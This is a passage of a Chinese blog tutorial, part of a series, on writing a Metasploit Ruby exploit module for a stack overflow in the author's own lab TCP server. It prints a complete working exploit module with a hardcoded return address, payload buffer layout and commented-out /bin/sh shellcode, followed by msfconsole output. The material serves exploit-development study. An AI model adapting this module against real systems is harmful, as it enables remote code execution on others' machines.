有了漏洞我们就可以进行攻击了。首先我们需要了解metasploit的exploit模块,具体可以看

http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

metasploit本身功能非常强大,这里不多做介绍。

首先我们需要添加一个针对这个漏洞的exploit模块,

我们直接在样例上进行修改:

root@bt:~/.msf4/modules# mkdir exploits

root@bt:~/.msf4/modules# cd exploits

root@bt:~/.msf4/modules/exploits# mkdir linux

root@bt:~/.msf4/modules/exploits/linux# cp /pentest/exploits/framework/documentation/samples/modules/exploits/sample.rb  myvictim.rb

root@bt:~/.msf4/modules/exploits/linux# ls

myvictim.rb  myvictimserver.rb  proftp_sreplace.rb

然后查看myvictim.rb

##

# $Id: sample.rb 9212 2010-05-03 17:13:09Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

module Msf

###

#

# This exploit sample shows how an exploit module could be written to exploit

# a bug in an arbitrary TCP server.

#

###

class Exploits::Sample < Msf::Exploit::Remote

        #

        # This exploit affects TCP servers, so we use the TCP client mixin.

        #

        include Exploit::Remote::Tcp

        def initialize(info = {})

                super(update_info(info,

                        'Name'           => 'Sample exploit',

                        'Description'    => %q{

                                        This exploit module illustrates how a vu

lnerability could be exploited

                                in an TCP server that has a parsing bug.

                        },

                        'Author'         => 'skape',

                        'Version'        => '$Revision: 9212 $',

                        'References'     =>

                                [

                                ],

                        'Payload'        =>

                                {

                                        'Space'    => 1000,

                                        'BadChars' => "\x00",

                                },

                        'Targets'        =>

                                [

                                        # Target 0: Windows All

                                        [

                                                'Windows Universal',

                                                {

                                                        'Platform' => 'win',

                                                        'Ret'      => 0x41424344

                                                }

                                        ],

                                ],

                        'DefaultTarget' => 0))

        end

        #

        # The sample exploit just indicates that the remote host is always

        # vulnerable.

        #

        def check

                return Exploit::CheckCode::Vulnerable

        end

        #

        # The exploit method connects to the remote service and sends 1024 A's

        # followed by the fake return address and then the payload.

        #

        def exploit

                connect

                print_status("Sending #{payload.encoded.length} byte payload..."

)

                # Build the buffer for transmission

                buf  = "A" * 1024

                buf += [ target.ret ].pack('V')

                buf += payload.encoded

                # Send it off

                sock.put(buf)

                sock.get

                handler

        end

end

end

然后我们需要把他添加进metasploit,运行reload_all

=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 719 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 1208 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

msf > reload_all

msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictimserver
use exploit/linux/mysql/mysql_yassl_hello
msf > use exploit/linux/my

这里并没有列出来我们刚刚添加的模块,说明模块有问题,必须修改,修改如下:

##

# $Id: myvictimserver.rb 9212 2014-11-03 17:13:09Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

###

#

# This exploit sample shows how an exploit module could be written to exploit

# a bug in an arbitrary TCP server.

#

###

class Metasploit3 < Msf::Exploit::Remote

    Rank = GreatRanking

    #

    # This exploit affects TCP servers, so we use the TCP client mixin.

    #

    include Exploit::Remote::Tcp

    def initialize(info = {})

        super(update_info(info,

            'Name'           => 'MyVictimSever',

            'Description'    => %q{

                    This exploit module illustrates how a vulnerability could be exploited

                in an TCP server that has a stackoverflow bug.

            },

            'Author'         => 'bai',

            'Version'        => '$Revision: 9212 $',

            'References'     =>

                [

                ],

            'Payload'        =>

                {

                    'Space'    => 116, #

                    'BadChars' => "\x00",

                },

            'Targets'        =>

                [

                    # Target 0: Windows All

                    [

                        'MyVictimSever run on linux',

                        {

                            'Platform' => 'Linux',

                            'Ret'      =>  0xbffff4a4

                        }

                    ],

                ],

            'DefaultTarget' => 0))

    end

    #

    # The sample exploit just indicates that the remote host is always

    # vulnerable.

    #

    def check

        return Exploit::CheckCode::Vulnerable

    end

    #

    # The exploit method connects to the remote service and sends 1024 A's

    # followed by the fake return address and then the payload.

    #

    def exploit

        connect

        print_status("Sending #{payload.encoded.length} byte payload...")

        # Build the buffer for transmission

        buf="";

        #buf  = "\x90" * 15

        #buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

        #buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

        #buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh";

        buf+="\xa4\xf4\xff\xbf"

        buf += payload.encoded

        buf += [].fill( target.ret,0,100).pack('V*')

        # Send it off

        sock.put(buf)

        sock.get

        handler

    end

end

这时候,我们就可以找到这个模块了。

msf > use exploit/linux/my

use exploit/linux/mysql/mysql_yassl_getname  use exploit/linux/myvictim

use exploit/linux/mysql/mysql_yassl_hello    use exploit/linux/myvictimserver

msf > use exploit/linux/my

使用metasploit进行栈溢出攻击-4的更多相关文章

  1. 使用metasploit进行栈溢出攻击-1

    攻击是在bt5下面进行,目标程序是在ubuntu虚拟机上运行. 首先,需要搞明白什么是栈溢出攻击,详细内容请阅读 http://blog.csdn.net/cnctloveyu/article/det ...

  2. 使用metasploit进行栈溢出攻击-2

    基本的栈溢出搞明白了,真实攻击中一个很重要的问题是shellcode生成. 利用Metasploit提供的工具,可以方便的生成shellcode,然后可以使用第一篇中的代码进行验证. 先说一下如何生成 ...

  3. 使用metasploit进行栈溢出攻击-3

    有了shellcode,就可以进行攻击了,但是要有漏洞才行,真实世界中的漏洞很复杂,并且很难发现,因此我专门做一个漏洞来进行攻击. 具体来说就是做一个简单的tcp server,里面包含明显的栈溢出漏 ...

  4. 使用metasploit进行栈溢出攻击-5

    我们先尝试使用这个脚本进行攻击: msf > use exploit/linux/myvictim msf exploit(myvictim) > set payload linux/x8 ...

  5. [转]现代Linux系统上的栈溢出攻击

    1. 基本内容 这个教程试着向读者展示最基本的栈溢出攻击和现代Linux发行版中针对这种攻击的防御机制.为此我选择了最新版本的Ubuntu系统(12.10),因为它默认集成了几个安全防御机制,而且它也 ...

  6. Linux下基本栈溢出攻击【转】

    转自:http://blog.csdn.net/wangxiaolong_china/article/details/6844415 版权声明:本文为博主原创文章,未经博主允许不得转载. 目录(?)[ ...

  7. [翻译]现代Linux系统上的栈溢出攻击【转】

    转自:http://www.codeweblog.com/%E7%BF%BB%E8%AF%91-%E7%8E%B0%E4%BB%A3linux%E7%B3%BB%E7%BB%9F%E4%B8%8A%E ...

  8. [转]初探Metasploit的自动攻击

    1. 科普Metasploit   以前只是个Back Track操作系统(简称:BT) 下的攻击框架,自成继承了后攻击渗透模块,隐隐有成为攻击平台的趋势. 我们都戏称它为美少妇,很简单,msf. 它 ...

  9. 实验三 kali下metasploit的漏洞攻击实践

    一.实验内容 1.使用kali进行靶机的漏洞扫描,利用metasploit选择其中的一个漏洞进行攻击,并获取权限. 2.分析攻击的原理以及获取了什么样的权限. 二.实验要求 1.熟悉kali原理和使用 ...

随机推荐

  1. vue.js初学(三)模板语法

    1:介绍 vue.js允许开发者声明式地将Dom元素绑定至Vue实例的底层,所有的模板都是合法的html,所以能够被遵循规范的浏览器和html解析器解析 在底层的实现上,vue将模板编译成虚拟Dom渲 ...

  2. BZOJ4520:[CQOI2016]K远点对

    浅谈\(K-D\) \(Tree\):https://www.cnblogs.com/AKMer/p/10387266.html 题目传送门:https://lydsy.com/JudgeOnline ...

  3. laravel的小坑

    写控制器的名的时候只能出现一个首写大写字母, 后面的都为小写字母 否则会报找不到该控制器的错误

  4. Vue项目开启步骤

    ## Build Setup # install cnpm //安装淘宝CNPM镜像npm install -g cnpm --registry=http://registry.npm.taobao. ...

  5. OpenWrt添加启动脚本

    1.在 /etc/init.d 目录下建立文件 vi silabs #!/bin/sh /etc/rc.common # Copyright (C) 2006 OpenWrt.org START=93 ...

  6. &(((struct A*)NULL)->m_float)---offsetof

    问题描述: struct A { int m_int; float m_float; }; int main(void) { printf("%p",&(((struct ...

  7. CSS2实用知识点详解

    CSS相关知识回顾目录 CSS2选择器 假选择器的使用 属性选择器的使用 边框设置 背景设置 字体设置 文本属性 a标签假选择器使用 列表设置 表格设置 鼠标设置 单位设置 隐藏显示 位置设置 清除浮 ...

  8. 2016.6.18主窗体、子窗体InitializeComponent()事件、Load事件发生顺序以及SeleChanged事件的发生

    主窗体,子窗体的InitializeComponent(构造函数).Load事件执行顺序 1.主窗体定义事件 new 主窗体() 构造函数进入主窗体InitializeComponent函数,该函数中 ...

  9. SUSE eth0 No such device

    删除 etc/udev/rules.d/70-persistent-net.rules 文件  之后重启让系统重新生成eth0配置文件 rm -f etc/udev/rules.d/70-persis ...

  10. java 多线程系列基础篇(八)之join()、start()、run()方法

    1. join()介绍 join() 定义在Thread.java中.join() 的作用:让“主线程”等待“子线程”结束之后才能继续运行.这句话可能有点晦涩,我们还是通过例子去理解: // 主线程 ...